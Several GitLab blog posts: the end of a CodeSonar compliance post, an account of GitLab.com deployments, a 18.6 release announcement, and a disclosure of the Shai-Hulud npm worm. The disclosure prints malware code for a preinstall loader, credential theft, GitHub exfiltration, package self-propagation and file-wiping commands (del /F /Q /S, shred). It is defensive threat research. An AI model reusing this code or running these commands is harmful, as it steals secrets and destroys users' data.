The workflow begins with a developer submitting a merge request for firmware changes. GitLab's CI/CD pipeline automatically triggers CodeSonar scanning, which performs deep C/C++ analysis against custom ISO 26262 policies configured in the pipeline. When CodeSonar identifies an ASIL-D relevant vulnerability, the pipeline halts automatically per the compliance policy, with clear documentation explaining the issue. The complete scan results, issue tracking, and approval workflow are maintained in GitLab as a single source of truth for audit trails.

Developers can use both the CodeSonar hub interface and GitLab Duo AI to understand the vulnerability. CodeSonar provides detailed information about the path through the source code that leads to the problem, along with code navigation features to isolate the root cause. GitLab Duo explains the vulnerability and provides specific remediation recommendations. After the developer implements the fix and validates the resolution, the code merges successfully with full compliance evidence automatically collected throughout the process.

## Benefits of the integration

Organizations implementing this integrated compliance approach with GitLab and CodeSonar will see significant improvements in both development velocity and compliance confidence.

* **Efficiency gains:** Development teams reduce time-to-market by catching coding standard compliance issues early, when they're less expensive to fix. Automated security policy enforcement decreases manual security review overhead, freeing specialists to focus on complex problems rather than routine checks. Audit readiness improves through automated evidence collection. Compliance artifacts are generated as a by-product of normal development rather than through separate documentation efforts.
* **Compliance maturity:** This integrated approach helps organizations maintain continuous compliance with industry standards and regulations. By embedding verification into every code change, teams build comprehensive audit trails that demonstrate adherence to ISO 26262, DO-178C, MISRA C/C++, and other requirements. The automated workflow transforms compliance from a periodic checkpoint into an ongoing verification process.

## Implementation considerations

Implementing the GitLab and CodeSonar integration requires access to GitLab Ultimate, a CodeSonar hub, GitLab runners where code can be compiled and analyzed, and appropriate mechanisms for managing analysis data files. Both GitLab and CodeSonar fully support **on-premises and air-gapped environments** and can be deployed to auto-scalable cloud environments as well.

Teams should configure Custom Compliance Frameworks in GitLab to define specific policies for their relevant standards: ISO 26262 for automotive, DO-178C for aerospace, IEC 62304 for medical devices, and others. These frameworks enable automated enforcement of compliance requirements through merge request approval rules, vulnerability thresholds, and scan policy gates.
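For orientation, here is a minimal sketch of what a scan job along these lines can look like in `.gitlab-ci.yml`. It is illustrative only: the `codesonar` and SARIF-conversion commands are hypothetical placeholders (the CodeSonar integration documentation has the real invocations), while `artifacts:reports:sast` is GitLab's standard mechanism for surfacing scanner output in merge requests:

```yaml
# Illustrative sketch only — the codesonar and conversion commands below are
# hypothetical placeholders; use the invocations from the CodeSonar docs.
codesonar_scan:
  stage: test
  script:
    # CodeSonar observes the compiler during a real build of the firmware
    - codesonar analyze my-firmware -- make firmware        # hypothetical CLI form
    # Convert SARIF results to GitLab's SAST report format
    - sarif-to-gl-sast results.sarif > gl-sast-report.json  # hypothetical converter
  artifacts:
    reports:
      sast: gl-sast-report.json  # feeds the MR widget, Security Dashboard, and policies
```

Emitting the converted report as a `sast` artifact is what lets findings flow into the merge request widget and the policy gates described above.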
## Get started

The CodeSonar GitLab CI component is available through GitLab's CI/CD Catalog. Detailed integration documentation provides platform-specific setup instructions for Linux, Docker, and Windows environments. For organizations evaluating this solution, the implementation demonstrates how specialized embedded systems tools can integrate with a modern DevSecOps platform to deliver both development velocity and compliance rigor. For more information about implementing GitLab with CodeSonar for your embedded systems development, visit the CodeSonar integration documentation. You can also request a trial of CodeSonar.
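If the CI component mentioned above follows the standard catalog shape, consuming it is a short `include`. The component path, version, and inputs below are placeholders, not the real values — copy the exact ones from the component's CI/CD Catalog page:

```yaml
# Hypothetical component path and inputs — take the real values from the
# CodeSonar component's CI/CD Catalog entry.
include:
  - component: gitlab.com/<codesonar-namespace>/<component-name>@<version>
    inputs:
      stage: test
```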
about.gitlab.com
December 2, 2025 at 10:32 PM
How we deploy the largest GitLab instance 12 times daily
Every day, GitLab deploys code changes to the world's largest GitLab instance — GitLab.com — up to 12 times without any downtime. We use GitLab's own CI/CD platform to manage these deployments, which impact millions of developers worldwide. This deployment frequency serves as our primary quality gate and stress test. It also means our customers get access to new features within hours of development rather than waiting weeks or months. When organizations depend on GitLab for their DevOps workflows, they're using a platform that's proven at scale on our own infrastructure. In this article, you'll learn how we built an automated deployment pipeline using core GitLab CI/CD functionality to handle this deployment complexity.

## The business case for deployment velocity

For GitLab: Our deployment frequency isn't just an engineering metric — it's a business imperative. Rapid deployment cycles mean we can respond to customer feedback within hours, ship security patches immediately, and validate new features in production before scaling them.

For our customers: Every deployment to GitLab.com validates the deployment practices we recommend to our users. When you use GitLab's deployment features, you're using the same battle-tested approach that handles millions of git operations, CI/CD pipelines, and user interactions daily. You benefit from:

* Latest features available immediately: New capabilities reach you within hours of completion, not in quarterly release cycles
* Proven reliability at scale: If a feature works on GitLab.com, you can trust it in your environment
* Full value of GitLab: Zero-downtime deployments mean you never lose access to your DevOps platform, even during updates
* Real-world tested practices: Our deployment documentation isn't theory — it's exactly how we run the largest GitLab instance in existence

## Code flow architecture

Our deployment pipeline follows a structured progression through multiple stages, each acting as a checkpoint on the journey from code proposal to production deployment.

```mermaid
graph TD
    A[Code Proposed] --> B[Merge Request Created]
    B --> C[Pipeline Triggered]
    C --> D[Build & Test]
    D --> E{Spec/Integration/QA Tests Pass?}
    E -->|No| F[Feedback Loop]
    F --> B
    E -->|Yes| G[Merge to default branch]
    G -->|Periodically| H[Auto-Deploy Branch]
    subgraph "Deployment Pipeline"
        H --> I[Package Creation]
        I --> K[Canary Environment]
        K --> L[QA Validation]
        L --> M[Main Environment]
    end
```

## Deployment pipeline makeup

Our deployment approach uses GitLab's native CI/CD capabilities to orchestrate complex deployments across hybrid infrastructure. Here's how we do it.

### Build

Building GitLab is a complex topic in and of itself, so I'll go over the details at a high level. We build both our Omnibus package and our Cloud Native GitLab (CNG) images. The Omnibus packages deploy to our Gitaly fleet (our Git storage layer), while CNG images run all other components as containerized workloads. Other stateful services like Postgres and Redis have grown so large that we have dedicated teams managing them separately. For GitLab.com, those systems are not deployed during our Auto-Deploy procedures.

We have a scheduled pipeline that regularly looks at `gitlab-org/gitlab` and searches for the most recent commit on the default branch with a successful ("green") pipeline. Green pipelines signal that every component of GitLab has passed its comprehensive test suite. We then create an **auto-deploy branch** from that commit.
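As a rough sketch of the idea (our actual logic lives in internal release tooling), a scheduled job can find the newest green default-branch pipeline and cut the branch through the GitLab API. `$API_TOKEN` here is an assumed CI/CD variable holding a token with `api` scope:

```yaml
# Conceptual sketch only — not GitLab's real release tooling. A scheduled
# pipeline picks the newest successful default-branch pipeline and creates
# an auto-deploy branch from its commit.
cut_auto_deploy_branch:
  rules:
    - if: $CI_PIPELINE_SOURCE == "schedule"
  image: alpine:latest
  before_script:
    - apk add --no-cache curl jq
  script:
    # Newest default-branch pipeline that finished successfully ("green")
    - |
      SHA=$(curl --silent --header "PRIVATE-TOKEN: $API_TOKEN" \
        "$CI_API_V4_URL/projects/$CI_PROJECT_ID/pipelines?ref=$CI_DEFAULT_BRANCH&status=success&per_page=1" \
        | jq -r '.[0].sha')
    # Create the auto-deploy branch at that commit
    - |
      curl --silent --request POST --header "PRIVATE-TOKEN: $API_TOKEN" \
        "$CI_API_V4_URL/projects/$CI_PROJECT_ID/repository/branches" \
        --data-urlencode "branch=auto-deploy-$(date +%Y%m%d%H%M)" \
        --data-urlencode "ref=$SHA"
```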
Creating the auto-deploy branch triggers a sequence of events: primarily, building this package and all of the components that are part of our monolith. Another scheduled pipeline selects the latest built package and initiates the deployment pipeline. Procedurally, it looks this simple:

```mermaid
graph LR
    A[Create branch] --> B[Build]
    B --> C[Choose Built package]
    C --> D[Start Deploy Pipeline]
```

Building takes some time, and since deployments can vary due to various circumstances, we choose the latest build to deploy. We technically build more versions of GitLab for .com than will ever be deployed. This ensures we always have a package lined up and ready to go, and it brings us as close as we can be to a fully continuously delivered product for .com.

### Environment-based validation and Canary strategy

Quality assurance (QA) isn't just an afterthought here — it's baked into every layer from development through deployment. Our QA process leverages automated test suites that include unit tests, integration tests, and end-to-end tests that simulate real user interactions with GitLab's features. But more importantly for our deployment pipeline, our QA process works hand-in-hand with our Canary strategy through environment-based validation.

As part of our validation approach, we leverage GitLab's native Canary deployments, enabling controlled validation of changes with limited traffic exposure before full production deployment. We send roughly 5% of all traffic through our Canary stage. This approach increases the complexity of database migrations, but successfully navigating Canary deployments ensures we deploy a reliable product seamlessly. The Canary deployment features you use in GitLab were refined through managing one of the most complex deployment scenarios in production. When you implement Canary deployments for your applications, you're using patterns proven at massive scale.

Our deployment process follows a progressive rollout strategy:

1. **Staging Canary:** Initial validation environment
2. **Production Canary:** Limited production traffic
3. **Staging Main:** Full staging environment deployment
4. **Production Main:** Full production rollout

```mermaid
graph TD
    C[Staging Canary Deploy]
    C --> D[QA Smoke Main Stage Tests]
    C --> E[QA Smoke Canary Stage Tests]
    D --> F
    E --> F{Tests Pass?}
    F -->|Yes| G[Production Canary Deploy]
    G --> S[QA Smoke Main Stage Tests]
    G --> T[QA Smoke Canary Stage Tests]
    F -->|No| H[Issue Creation]
    H --> K[Fix & Backport]
    K --> C
    S --> M[Canary Traffic Monitoring]
    T --> M[Canary Traffic Monitoring baking period]
    M --> U[Production Safety Checks]
    U --> N[Staging Main]
    N --> V[Production Main]
```

Our QA validation occurs at multiple checkpoints throughout this progressive deployment process: after each Canary deployment, and again after post-deploy migrations. This multilayered approach ensures that each phase of our deployment strategy has its own safety net. You can learn more about GitLab's comprehensive testing approach in our handbook.

## Deployment pipeline

Here are the challenges we address across our deployment pipeline.

### Technical architecture considerations

GitLab.com represents real-world deployment complexity at scale. As the largest known GitLab instance, GitLab.com is deployed using our official GitLab Helm chart and the official Linux package — the same artifacts our customers use. You can learn more about the GitLab.com architecture in our handbook.
This hybrid approach means our deployment pipeline must intelligently handle both containerized services and traditional Linux services in the same deployment cycle.

**Dogfooding at scale:** We deploy using the same procedures we document for zero-downtime upgrades. If something doesn't work smoothly for us, we don't recommend it to customers. This self-imposed constraint drives continuous improvement in our deployment tooling.

The following stages are run for all environment and stage upgrades:

```mermaid
graph LR
    a[prep] --> c[Regular Migrations - Canary stage only]
    a --> f[Assets - Canary stage only]
    c --> d[Gitaly]
    d --> k8s
    subgraph subGraph0["VM workloads"]
        d["Gitaly"]
    end
    subgraph subGraph1["Kubernetes workloads"]
        k8s["k8s"]
    end
    subgraph fleet["fleet"]
        subGraph0
        subGraph1
    end
```

**Stage details:**

* **Prep:** Validates deployment readiness and performs pre-deployment checks
* **Migrations:** Executes regular database migrations. This only happens during the Canary stage. Because both Canary and Main stages share the same database, these changes are already available when the Main stage deploys, eliminating the need to repeat these tasks.
* **Assets:** We leverage a GCS bucket for all static assets. If any new assets are created, we upload them to our bucket so that they are immediately available to our Canary stage. Because we use Webpack and include SHAs in asset filenames, we don't have to worry about overwriting an older asset. Old assets therefore continue to be available for older deployments, and new assets are immediately made available when Canary begins its deploy. This only happens during the Canary stage deployment. Because Canary and Main stages share the same asset storage, these changes are already available when the Main stage deploys.
* **Gitaly:** Updates the Gitaly virtual machine storage layer via our Omnibus Linux package on each Gitaly node. This service is unique as we bundle it with `git`. Therefore, we need to ensure that this service is capable of atomic upgrades. We leverage a wrapper around Gitaly, which enables us to install a newer version of Gitaly and use the `tableflip` library to cleanly rotate the running Gitaly process, ensuring high availability of this service on each of our instances.
* **Kubernetes:** Deploys containerized GitLab components via our Helm chart. Note that we deploy to numerous clusters spread across zones for redundancy, so these are usually broken into their own stages to minimize harm and sometimes allow us to stop mid-deploy if critical issues are detected.

### Multi-version compatibility: The hidden challenge

As you read our process, you will notice that there's a period of time where our database schema is ahead of the code that the Main stage knows about. This happens because the Canary stage has already deployed new code and runs regular database migrations, but the Main stage is still running the previous version of the code that doesn't know about these new database changes.

**Real-world example:** Imagine we're adding a new `merge_readiness` field to merge requests. During deployment, some servers are running code that expects this field, while others don't know it exists yet. If we handle this poorly, we break GitLab.com for millions of users. If we handle it well, nobody notices anything happened.

This occurs with most other services, as well.
For example, if a client sends multiple requests, there's a chance one of them might land in our Canary stage while other requests are directed to the Main stage. This is not too different from a deploy itself, as it takes a decent amount of time to roll through the few thousand Pods that run our services. With a few exceptions, the vast majority of our services will run a slightly newer version of a component in Canary for a period of time.

In a sense, these scenarios are all transient states. But they can often persist for several hours or days in a live, production environment. Therefore, we must treat them with the same care as permanent states. During any deployment, we have multiple versions of GitLab running simultaneously, and they all need to play nicely together.

## Database operations

Database migrations present a unique challenge in our Canary deployment model. We need schema changes to support new features while maintaining our ability to roll back if issues arise. Our solution involves careful separation of concerns:

* **Regular migrations:** Run during the Canary stage, are designed to be backward-compatible, and consist of only reversible changes
* **Post-deploy migrations:** The "point of no return" migrations that happen only after multiple successful deployments

Database changes are handled with precision and extensive validation procedures:

```mermaid
graph LR
    A[Regular Migrations] --> B[Canary Stage Deploy]
    B --> C[Main Stage Deploy]
    C --> D[Post Deploy Migrations]
```

### Post-deploy migrations

GitLab deployments involve many components. Updating GitLab is not atomic, so many components must be backward-compatible. Post-deploy migrations often contain changes that can't be easily rolled back — think data transformations, column drops, or structural changes that would break older code versions. By running them _after_ we've gained confidence through multiple successful deployments, we ensure:

1. **The new code is stable** and we're unlikely to need a rollback
2. **Performance characteristics** are well understood in production
3. **Any edge cases** have been discovered and addressed
4. **The blast radius** is minimized if something does go wrong

This approach provides the optimal balance: enabling rapid feature deployment through Canary releases while maintaining rollback capabilities until we have high confidence in deployment stability.

**The expand-migrate-contract pattern:** Our database, frontend, and application compatibility changes follow a carefully orchestrated three-phase approach.

1. **Expand:** Add new structures (columns, indexes) while keeping old ones functional
2. **Migrate:** Deploy new application code that uses the new structures
3. **Contract:** Remove old structures in post-deploy migrations after everything is stable

**Real-world example:** When adding a new `merge_readiness` column to merge requests:

1. **Expand:** Add the new column with a default value; existing code ignores it
2. **Migrate:** Deploy code that reads and writes to the new column while still supporting the old approach
3. **Contract:** After several successful deployments, remove the old column in a post-deploy migration

All database operations, application code, frontend code, and more are subject to a set of guidelines that Engineering must adhere to, which can be found in our Multi-Version Compatibility documentation.
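To make the progression and migration ordering concrete, here is a hedged sketch of the overall shape in GitLab CI terms. The job names and the `deploy.sh`/migration scripts are illustrative assumptions, not our actual deployment tooling:

```yaml
# Illustrative shape of a progressive rollout — not GitLab's real deployer.
stages: [canary, main, post-deploy]

staging_canary:
  stage: canary
  environment: staging/canary
  script: ./deploy.sh staging canary        # hypothetical helper script

production_canary:
  stage: canary
  needs: [staging_canary]
  environment: production/canary
  script: ./deploy.sh production canary

staging_main:
  stage: main
  needs: [production_canary]
  environment: staging/main
  script: ./deploy.sh staging main

production_main:
  stage: main
  needs: [staging_main]
  environment: production/main
  script: ./deploy.sh production main

post_deploy_migrations:
  stage: post-deploy
  needs: [production_main]
  when: manual                              # run only once confidence is established
  script: ./run-post-deploy-migrations.sh   # hypothetical migration runner
```

The manual gate on the post-deploy job mirrors the "point of no return" idea: irreversible changes run only after the progressive stages have all succeeded.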
## Results and impact

Our deployment infrastructure delivers measurable benefits:

**For GitLab**

* Up to 12 deployments daily to GitLab.com
* Zero-downtime deployments serving millions of developers
* Security patches can reach production within hours, not days
* New features validated in production at massive scale before general availability

**For customers**

* Proven deployment patterns you can adopt for your own applications
* Features battle-tested on the world's largest GitLab instance before reaching your environment
* Documentation that reflects actual production practices, not theoretical best practices
* Confidence that GitLab's recommended upgrade procedures work at any scale

## Key takeaways for engineering teams

GitLab's deployment pipeline represents a sophisticated system that balances deployment velocity with operational reliability. The progressive deployment model, comprehensive testing integration, and robust rollback capabilities provide a foundation for reliable software delivery at scale. For engineering teams implementing similar systems, key considerations include:

* **Automated testing:** Comprehensive test coverage throughout the deployment pipeline
* **Progressive rollout:** Staged deployments to minimize risk and enable rapid recovery
* **Monitoring integration:** Comprehensive observability across all deployment stages
* **Incident response:** Rapid detection and resolution capabilities for deployment issues

GitLab's architecture demonstrates how modern CI/CD systems can manage the complexity of large-scale deployments while maintaining the velocity required for competitive software development.

## Important note on scope

This article specifically covers the deployment pipeline for services that are part of the **GitLab Omnibus package** and **Helm chart** — essentially the core GitLab monolith and its tightly integrated components. However, GitLab's infrastructure landscape extends beyond what's described here. Other services, notably our **AI services** and services that might be in a **proof of concept state**, follow a different deployment approach using our internal platform called Runway. If you're working with or curious about these other services, you can find more information in the Runway documentation. Other offerings, such as GitLab Dedicated, are deployed more in alignment with what we expect customers to be capable of performing themselves by way of the **GitLab Environment Toolkit**. If you'd like to learn more, check out the GitLab Environment Toolkit project.

The deployment strategies, architectural considerations, and pipeline complexities outlined in this article represent the battle-tested approach we use for our core platform — but like any large engineering organization, we have multiple deployment strategies tailored to different service types and maturity levels. Further documentation about Auto-Deploy and our procedures can be found at the links below:

* Engineering Deployments
* Release Procedural Documentation

## More resources

* How we decreased GitLab repo backup times from 48 hours to 41 minutes
* How we supercharged GitLab CI statuses with WebSockets
* How we reduced MR review time with Value Stream Management
about.gitlab.com
December 1, 2025 at 10:31 PM
GitLab discovers widespread npm supply chain attack
GitLab's Vulnerability Research team has identified an active, large-scale supply chain attack involving a destructive malware variant spreading through the npm ecosystem. Our internal monitoring system has uncovered multiple infected packages containing what appears to be an evolved version of the "Shai-Hulud" malware. Early analysis shows worm-like propagation behavior that automatically infects additional packages maintained by impacted developers. Most critically, we've discovered the malware contains a "**dead man's switch**" mechanism that threatens to destroy user data if its propagation and exfiltration channels are severed.

**We verified that GitLab was not using any of the malicious packages and are sharing our findings to help the broader security community respond effectively.**

## Inside the attack

Our internal monitoring system, which scans open-source package registries for malicious packages, has identified multiple npm packages infected with sophisticated malware that:

* Harvests credentials from GitHub, npm, AWS, GCP, and Azure
* Exfiltrates stolen data to attacker-controlled GitHub repositories
* Propagates by automatically infecting other packages owned by victims
* **Contains a destructive payload that triggers if the malware loses access to its infrastructure**

While we've confirmed several infected packages, the worm-like propagation mechanism means many more packages are likely compromised. The investigation is ongoing as we work to understand the full scope of this campaign.

## Technical analysis: How the attack unfolds

### Initial infection vector

The malware infiltrates systems through a carefully crafted multi-stage loading process. Infected packages contain a modified `package.json` with a preinstall script pointing to `setup_bun.js`. This loader script appears innocuous, claiming to install the Bun JavaScript runtime, which is a legitimate tool. However, its true purpose is to establish the malware's execution environment.

```javascript
// This file gets added to victim's packages as setup_bun.js
#!/usr/bin/env node

async function downloadAndSetupBun() {
  // Downloads and installs bun
  let command = process.platform === 'win32'
    ? 'powershell -c "irm bun.sh/install.ps1|iex"'
    : 'curl -fsSL https://bun.sh/install | bash';
  execSync(command, { stdio: 'ignore' });

  // Runs the actual malware
  runExecutable(bunPath, ['bun_environment.js']);
}
```

The `setup_bun.js` loader downloads or locates the Bun runtime on the system, then executes the bundled `bun_environment.js` payload, a 10MB obfuscated file already present in the infected package. This approach provides multiple layers of evasion: the initial loader is small and seemingly legitimate, while the actual malicious code is heavily obfuscated and bundled into a file too large for casual inspection.

### Credential harvesting

Once executed, the malware immediately begins credential discovery across multiple sources:

* **GitHub tokens**: Searches environment variables and GitHub CLI configurations for tokens starting with `ghp_` (GitHub personal access token) or `gho_` (GitHub OAuth token)
* **Cloud credentials**: Enumerates AWS, GCP, and Azure credentials using official SDKs, checking environment variables, config files, and metadata services
* **npm tokens**: Extracts tokens for package publishing from `.npmrc` files and environment variables, which are common locations for securely storing sensitive configuration and credentials.
* **Filesystem scanning**: Downloads and executes Trufflehog, a legitimate security tool, to scan the entire home directory for API keys, passwords, and other secrets hidden in configuration files, source code, or git history.

```javascript
async function scanFilesystem() {
  let scanner = new Trufflehog();
  await scanner.initialize();

  // Scan user's home directory for secrets
  let findings = await scanner.scanFilesystem(os.homedir());

  // Upload findings to exfiltration repo
  await github.saveContents("truffleSecrets.json", JSON.stringify(findings));
}
```

### Data exfiltration network

The malware uses stolen GitHub tokens to create public repositories with a specific marker in their description: "Sha1-Hulud: The Second Coming." These repositories serve as dropboxes for stolen credentials and system information.

```javascript
async function createRepo(name) {
  // Creates a repository with a specific description marker
  let repo = await this.octokit.repos.createForAuthenticatedUser({
    name: name,
    description: "Sha1-Hulud: The Second Coming.", // Marker for finding repos later
    private: false,
    auto_init: false,
    has_discussions: true
  });

  // Install GitHub Actions runner for persistence
  if (await this.checkWorkflowScope()) {
    let token = await this.octokit.request(
      "POST /repos/{owner}/{repo}/actions/runners/registration-token"
    );
    await installRunner(token); // Installs self-hosted runner
  }
  return repo;
}
```

Critically, if the initial GitHub token lacks sufficient permissions, the malware searches for other compromised repositories with the same marker, allowing it to retrieve tokens from other infected systems. This creates a resilient botnet-like network where compromised systems share access tokens.

```javascript
// How the malware network shares tokens:
async fetchToken() {
  // Search GitHub for repos with the identifying marker
  let results = await this.octokit.search.repos({
    q: '"Sha1-Hulud: The Second Coming."',
    sort: "updated"
  });

  // Try to retrieve tokens from compromised repos
  for (let repo of results) {
    let contents = await fetch(
      `https://raw.githubusercontent.com/${repo.owner}/${repo.name}/main/contents.json`
    );
    let data = JSON.parse(Buffer.from(contents, 'base64').toString());
    let token = data?.modules?.github?.token;
    if (token && await validateToken(token)) {
      return token; // Use token from another infected system
    }
  }
  return null; // No valid tokens found in network
}
```

### Supply chain propagation

Using stolen npm tokens, the malware:

1. Downloads all packages maintained by the victim
2. Injects the `setup_bun.js` loader into each package's preinstall scripts
3. Bundles the malicious `bun_environment.js` payload
4. Increments the package version number
5. Republishes the infected packages to npm

```javascript
async function updatePackage(packageInfo) {
  // Download original package
  let tarball = await fetch(packageInfo.tarballUrl);

  // Extract and modify package.json
  let packageJson = JSON.parse(await readFile("package.json"));

  // Add malicious preinstall script
  packageJson.scripts.preinstall = "node setup_bun.js";

  // Increment version
  let version = packageJson.version.split(".").map(Number);
  version[2] = (version[2] || 0) + 1;
  packageJson.version = version.join(".");

  // Bundle backdoor installer
  await writeFile("setup_bun.js", BACKDOOR_CODE);

  // Repackage and publish
  await Bun.$`npm publish ${modifiedPackage}`.env({ NPM_CONFIG_TOKEN: this.token });
}
```

## The dead man's switch

Our analysis uncovered a destructive payload designed to protect the malware's infrastructure against takedown attempts.
The malware continuously monitors its access to GitHub (for exfiltration) and npm (for propagation). If an infected system loses access to both channels simultaneously, it triggers immediate data destruction on the compromised machine. On Windows, it attempts to delete all user files and overwrite disk sectors. On Unix systems, it uses `shred` to overwrite files before deletion, making recovery nearly impossible.

```javascript
// CRITICAL: Token validation failure triggers destruction
async function aL0() {
  let githubApi = new dq();
  let npmToken = process.env.NPM_TOKEN || await findNpmToken();

  // Try to find or create GitHub access
  if (!githubApi.isAuthenticated() || !githubApi.repoExists()) {
    let fetchedToken = await githubApi.fetchToken(); // Search for tokens in compromised repos
    if (!fetchedToken) {
      // No GitHub access possible
      if (npmToken) {
        // Fallback to NPM propagation only
        await El(npmToken);
      } else {
        // DESTRUCTION TRIGGER: No GitHub AND no NPM access
        console.log("Error 12");
        if (platform === "windows") {
          // Attempts to delete all user files and overwrite disk sectors
          Bun.spawnSync(["cmd.exe", "/c",
            "del /F /Q /S \"%USERPROFILE%*\" && " +
            "for /d %%i in (\"%USERPROFILE%*\") do rd /S /Q \"%%i\" & " +
            "cipher /W:%USERPROFILE%" // Overwrite deleted data
          ]);
        } else {
          // Attempts to shred all writable files in home directory
          Bun.spawnSync(["bash", "-c",
            "find \"$HOME\" -type f -writable -user \"$(id -un)\" -print0 | " +
            "xargs -0 -r shred -uvz -n 1 && " + // Overwrite and delete
            "find \"$HOME\" -depth -type d -empty -delete" // Remove empty dirs
          ]);
        }
        process.exit(0);
      }
    }
  }
}
```

This creates a dangerous scenario. If GitHub mass-deletes the malware's repositories or npm bulk-revokes compromised tokens, thousands of infected systems could simultaneously destroy user data. The distributed nature of the attack means that each infected machine independently monitors access and will trigger deletion of the user's data when a takedown is detected.

## Indicators of compromise

To aid in detection and response, here is a more comprehensive list of the key indicators of compromise (IoCs) identified during our analysis.

Type | Indicator | Description
---|---|---
**file** | `bun_environment.js` | Malicious post-install script in node_modules directories
**directory** | `.truffler-cache/` | Hidden directory created in user home for Trufflehog binary storage
**directory** | `.truffler-cache/extract/` | Temporary directory used for binary extraction
**file** | `.truffler-cache/trufflehog` | Downloaded Trufflehog binary (Linux/Mac)
**file** | `.truffler-cache/trufflehog.exe` | Downloaded Trufflehog binary (Windows)
**process** | `del /F /Q /S "%USERPROFILE%*"` | Windows destructive payload command
**process** | `shred -uvz -n 1` | Linux/Mac destructive payload command
**process** | `cipher /W:%USERPROFILE%` | Windows secure deletion command in payload
**command** | `curl -fsSL https://bun.sh/install \| bash` |
**command** | `powershell -c "irm bun.sh/install.ps1 \| iex"` |

## Looking ahead

This campaign represents an evolution in supply chain attacks where the threat of collateral damage becomes the primary defense mechanism for the attacker's infrastructure. The investigation is ongoing as we work with the community to understand the full scope and develop safe remediation strategies. GitLab's automated detection systems continue to monitor for new infections and variations of this attack.
By sharing our findings early, we hope to help the community respond effectively while avoiding the pitfalls created by the malware's dead man's switch design.
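As a starting point for your own response, the published IoCs translate directly into a pipeline check. This is a hedged sketch, not an official GitLab scanner; it simply fails a job when the two strongest file-level markers appear anywhere in a checkout:

```yaml
# Hedged detection sketch based on the IoCs above — not an official scanner.
# Fails the pipeline if known Shai-Hulud markers are found in the tree.
shai_hulud_ioc_check:
  stage: test
  image: alpine:latest
  script:
    # Flag the bundled payload file anywhere in the checkout or node_modules
    - '! find . -name "bun_environment.js" | grep .'
    # Flag package.json files whose preinstall hook invokes the loader
    - '! find . -name package.json -print0 | xargs -0 -r grep -l "setup_bun.js" | grep .'
```

Pair a check like this with token rotation and a review of recently published package versions, since the IoCs alone cannot prove a machine was never compromised.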
about.gitlab.com
November 25, 2025 at 10:31 PM
GitLab 18.6: From configuration to control
With GitLab 18.6, we’re continuing to advance how AI integrates into everyday software development with enhancements that give teams greater choice and control. GitLab 18.6 will help teams plan, build, and secure software more intelligently across the entire software lifecycle. Teams now have greater flexibility to select the right models for their workflows, extend AI into secure and self-managed environments, and strengthen visibility and governance across every stage of development.

## AI that adapts to you

With 18.6, GitLab’s AI becomes more adaptable to real-world workflows. GitLab Duo Agents now plan with greater context, work seamlessly across IDEs and self-managed instances, and offer new open-source model options — helping teams accelerate delivery without compromising compliance or control.

**GitLab Duo Planner and Security Analyst agent enhancements**

In 18.6, GitLab Duo Planner and GitLab Duo Security Analyst are now available by default in the Agentic Chat dropdown — no configuration or setup required. Both agents can be used immediately across projects and groups, giving teams built-in assistance for planning, issue refinement, and security analysis. GitLab Duo Planner agent now works at the group level with awareness of the epic being viewed and supports milestone and iteration workflows. Security Analyst agent provides automated vulnerability review, context interpretation, and guided remediation suggestions. Both agents are also available to self-managed customers. For a full list of what these agents can do, see the documentation.

**gpt-oss-120b model support for GitLab Duo Agent Platform**

GitLab Duo Self-Hosted customers can now deploy the **gpt-oss-120b** model within the GitLab Duo Agent Platform — a high-performance, fully open-source model optimized for agentic workflows. This addition enables teams to execute complex tasks and reasoning-driven processes while maintaining control over model transparency and infrastructure. For organizations that require open, auditable models to address compliance or data sovereignty requirements, gpt-oss-120b provides a reliable alternative to proprietary models without sacrificing performance. For more information on supported models, please see our documentation.

**End-user model selection for cloud-connected self-managed instances (GA)**

Cloud-connected self-managed end users can now choose which AI model powers their GitLab Duo Agentic Chat experience directly from the GitLab UI. This gives administrators and end users more control over how conversations perform and how costs and governance requirements are managed. No matter the deployment environment — on-premises, private cloud, or public cloud — teams can select regionally compliant or in-house models to help satisfy data residency needs and compare model quality for speed or accuracy. This flexibility ensures that every organization can tailor Agentic Chat to its operational priorities. For full details on how to select a model in Agentic Chat, see the model selection section of the GitLab documentation.

**Web IDE support for air-gapped deployments**

Air-gapped or tightly controlled environments — such as public sector organizations, defense agencies, and regulated enterprises — can now run the Web IDE with full functionality even without internet access. By allowing administrators to configure their own Web IDE extension host domain, GitLab enables markdown preview, code editing, and GitLab Duo Chat capabilities in isolated or offline systems.
This makes it possible for development teams in secure or restricted networks to benefit from modern IDE workflows without sacrificing security and compliance.

**Modern interface now default for self-managed instances**

Self-managed GitLab instances now default to the modern interface in 18.6, bringing the same streamlined experience already available on GitLab.com to on-premises deployments. The updated layout improves navigation consistency and makes core workflows more intuitive across the platform. Administrators maintain full flexibility with opt-out controls via feature flag or user-level toggling if needed. This update ensures self-managed customers benefit from GitLab's latest interface improvements while maintaining the control and customization options enterprise environments require.

## Platform security with awareness and authority

GitLab 18.6 strengthens platform security with deeper context and clearer control, helping security teams focus on the risks that matter most while maintaining governance across every project.

**Security attributes and context filtering**

Security teams can now apply custom business context labels to projects and groups, transforming raw scan results into prioritized, risk-based insights. Instead of viewing vulnerabilities in isolation, teams can tag projects by business unit, application type, or criticality — then filter and sort security data by impact. This allows organizations to focus remediation on the areas of greatest business risk, helping to accelerate time to resolution for the issues that matter most.

**Security Manager default role**

To simplify access control and onboarding for security professionals, GitLab introduces a new Security Manager role. This role provides comprehensive permissions across vulnerability management, policy configuration, and compliance features — while maintaining separation of duties by restricting administrative and code modification rights. Security teams gain the access they need from day one, along with governance, consistency, and accountability across the platform.

## AI that adapts to your workflow

This release represents more than new capabilities — it's about how GitLab Duo Agent Platform is becoming an embedded part of everyday software development workflows. Watch a walkthrough video that shows how a member of your software development team can start on a new project using GitLab Duo Agent Platform:

<div style="padding:56.25% 0 0 0;position:relative;"><iframe src="https://player.vimeo.com/video/1138657697?badge=0&autopause=0&player_id=0&app_id=58479" frameborder="0" allow="autoplay; fullscreen; picture-in-picture; clipboard-write; encrypted-media; web-share" referrerpolicy="strict-origin-when-cross-origin" style="position:absolute;top:0;left:0;width:100%;height:100%;" title="GitLab 18.6 walkthrough demo"></iframe></div><script src="https://player.vimeo.com/api/player.js"></script>

## Get started today

GitLab Premium and Ultimate users can start using these capabilities today on GitLab.com and self-managed environments, with availability for GitLab Dedicated customers planned for next month. New to GitLab? Start your free trial and see why the future of development is AI-powered, secure, and orchestrated through the world’s most comprehensive DevSecOps platform.

_**Note:** GitLab Duo Agent Platform is currently in beta. Platform capabilities that are in beta are available as part of the GitLab Beta program.
